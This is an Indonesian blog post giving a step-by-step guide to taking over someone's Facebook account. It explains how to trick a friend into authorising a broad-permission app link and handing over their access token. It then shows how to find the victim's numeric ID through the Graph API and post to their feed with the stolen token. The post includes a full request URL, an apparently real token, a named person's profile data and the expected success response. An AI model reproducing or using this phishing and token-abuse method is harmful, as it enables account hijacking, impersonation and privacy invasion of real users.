Cara Hack Facebook Dengan Access Token




Hai temen temen kali ini saya akan membagi tips hack facebook. yang mudah digunakan..... pingin tau caranya berikut caranya :
Ini adalah link access token CAUSE :
https://www.facebook.com/dialog/permissions.request?app_id=2318966938&next=http%3A%2F%2Fwww.facebook.com%2F&response_type=token
&perms=publish_stream%2Coffline_access%2Cuser_photos%2Cfriends_
photos%2Cpublish_actions%2
Cread_stream%2Cemail%2Cuser_status%2Cuser_activities%2Cuser_likes%2Cmana
ge_pages
gak hanya link ini, kalian bisa juga menggunakan link access token yg lainnya kok ;)
berikan link tersebut kepada salah 1 teman anda (target). dan mintalah access token mereka
http://www.facebook.com/?access_tokenAAABempp6Ls0BAGN2cciPd2VDNAF0deEgIHzhqGjS9WjUMI
2SWvh8xO9PzN7ZBsoVIiTKd4AbZCYvKdw8VxwFHDeawnCFQ88v4lMRrVbwZDZD&
expires_in=0
(yg tebal itu access token)
Nah, sekarang yg di perlukan ID Facebook korban. Sudah tau gimana cara mendapatkan ID korban??
kesini  http://graph.facebook.com/UsernameKorban
contoh:  http://graph.facebook.com/yogabrutal
maka akan tampil seperti ini
{
   "id": "100001053031325",
   "name": "Yogi Prayoga",
   "first_name": "Yogi",
   "last_name": "Prayoga",
   "gender": "male",
   "locale": "id_ID"
}
yg tebal itu adalah ID
sudah dapat ID dan Access tokennya, kini saatnya kita bermain2 dengan status FB dia :D
https://graph.facebook.com/IDKorban/feed?method=POST&message=Pesan yang mau disampaikan &access_token=AccessToken
tuh, isi lah yang saya tebalkan

Gini pengisiannya :
Copy paste kan ini di URL ini pada address bar, kemudian tekan ENTER
https://graph.facebook.com/100001053031325/feed?method=POST&message=http://blog-gunaya.blogspot.com . adalah blog terbaik sepanjang masa&access_token=AAABempp6Ls0BAGN2cciPd2VDNAF0deEgIHzhqGjS9
WjUMI2SWvh8xO9PzN7ZBsoVIiTKd4AbZCYvKdw8VxwFHDeawnCFQ88v4lMRrVbwZDZD


{
   "id": "100001053031325_450779631633801"
}
nah,kalau begini hasilnya, berarti success. dan kalau bukan begini atau ada tulisan error, berarti gagal

0 Coment: